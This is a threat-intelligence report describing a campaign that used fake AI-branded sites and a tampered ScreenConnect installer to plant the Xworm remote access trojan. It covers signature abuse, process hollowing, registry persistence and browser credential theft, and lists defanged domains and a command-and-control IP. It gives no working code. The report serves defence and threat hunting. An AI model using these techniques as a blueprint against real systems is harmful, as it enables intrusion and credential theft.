In a sophisticated cyberattack uncovered by Trustwave’s SpiderLabs team, threat actors have exploited the legitimate remote management tool, ScreenConnect, to deploy the Xworm Remote Access Trojan (RAT). This multi-stage infection chain leverages deceptive AI-themed content and manipulates digital signatures to evade detection.
Initial Attack Vector:
The campaign begins with social engineering tactics, enticing victims to visit counterfeit AI websites such as gptgrok[.]ai, which redirects to anhemvn6[.]com. Here, users are prompted to download files with names like Creation_Made_By_GrokAI.mp4 Grok.com, which are actually disguised installers for ScreenConnect. Variations of these filenames, including references to GoogleAI and SoraAI, suggest a broad campaign exploiting the credibility of AI-related terms.
Exploitation of Code-Signing Certificates:
The attackers have manipulated Authenticode Microsoft code-signing certificates to embed malicious configurations within the digital signature of the legitimate ScreenConnect binary. Upon execution, the installer deploys the ScreenConnect client in the user’s Temp directory, configured to operate covertly. It connects silently to an attacker-controlled ScreenConnect server, utilizing parameters embedded within the Authenticode signature to maintain a valid digital signature and evade tampering. Visual indicators are disabled to keep the session invisible to the user.
Payload Deployment and Execution:
During the remote access session, attackers deploy a batch script named X-META Firebase_crypted.bat, which triggers mshta.exe to launch another hidden batch file. This script downloads and unpacks 5btc.zip from anhemvn4[.]com, revealing a Python interpreter renamed to pw.exe and an encoded basse64.txt payload. Instead of writing malicious code to disk, the attackers use process hollowing techniques with msedge.exe and chrome.exe, injecting Base64-encoded Python commands fetched directly from a public GitHub repository. This fileless execution method hinders static detection and allows the Xworm RAT components to be delivered stealthily.
Establishing Persistence:
To maintain long-term access, the attackers create a Run key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run named Windows Security, pointing to a backup.bat script in C:\xmetavip. Upon each login, this script re-launches pw.exe with new Base64 commands, fetching additional payloads such as buquabua.txt.
Credential Access and Discovery:
The campaign includes stages for credential access and system discovery. WMI queries gather operating system and antivirus details, while the RAT attempts to harvest browser-stored login data from Chrome, Edge, and Firefox profiles. Analysts noted that the GitHub repository hosting the obfuscated Python scripts contained eleven files—split between persistence implanters and complex RAT loaders created just a week before the attack. One final payload script, Exppiyt.txt, embedded a command-and-control server IP (5[.]181[.]165[.]102:7705) that was not flagged as malicious on VirusTotal at the time of analysis.
Implications and Recommendations:
This incident underscores a growing trend where attackers co-opt trusted tools and AI branding to bypass automated defenses. Modern Endpoint Detection and Response (EDR) and signature-based solutions struggled to detect this threat, highlighting the importance of proactive, human-led threat hunting. Organizations are advised to invest in skilled threat hunters who can think like attackers, combining automated detection with expert analysis to uncover hidden threats before they can inflict damage.
